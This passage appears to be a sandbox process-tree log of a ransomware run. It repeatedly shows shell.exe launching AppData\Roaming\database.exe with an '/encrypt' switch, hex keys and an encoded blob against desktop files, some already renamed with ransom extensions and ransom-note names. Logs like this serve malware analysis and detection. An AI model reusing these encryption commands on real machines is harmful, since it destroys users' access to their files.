"+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ClearCheckpoint.cr2.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7724
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ClearRestore.mpeg3.sage.gif"5⤵PID:7732
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CloseMeasure.ADT.sage.gif"5⤵PID:7740
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\cmd.exe.lnk.gif"5⤵PID:7752
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CmqL7QFf-57e8zezN.[[email protected]].gif"5⤵PID:7764
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CompleteFormat.mid.sage.gif"5⤵PID:7668
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ConvertFromExport.vssm.gif"5⤵PID:7652
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7776
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisableProtect.cab.sage.gif"5⤵PID:7788
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisconnectWait.bmp.sage.gif"5⤵PID:7796
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ExitGrant.svgz.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7660
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FILES ENCRYPTED.txt"5⤵PID:7812
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FindRepair.vsdm.gif"5⤵PID:3380
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\HideClose.cr2.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7804
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\InitializeAssert.pps.sage.gif"5⤵PID:7816
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\InitializeResolve.mhtml.sage.gif"5⤵PID:7824
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\JoinRestart.nfo.sage.gif"5⤵PID:7828
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ProtectOpen.jpeg.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:7836
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\README_sTlLoTpq.hta.gif"5⤵PID:7844
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ReceiveExpand.avi.sage.gif"5⤵PID:7856
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RemoveSet.mp2v.gif"5⤵PID:7864
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ResetCopy.mpeg.sage.gif"5⤵PID:7872
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\Restore-My-Files.txt"5⤵PID:7880
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RestoreExpand.fon.sage.gif"5⤵PID:7888
-
-
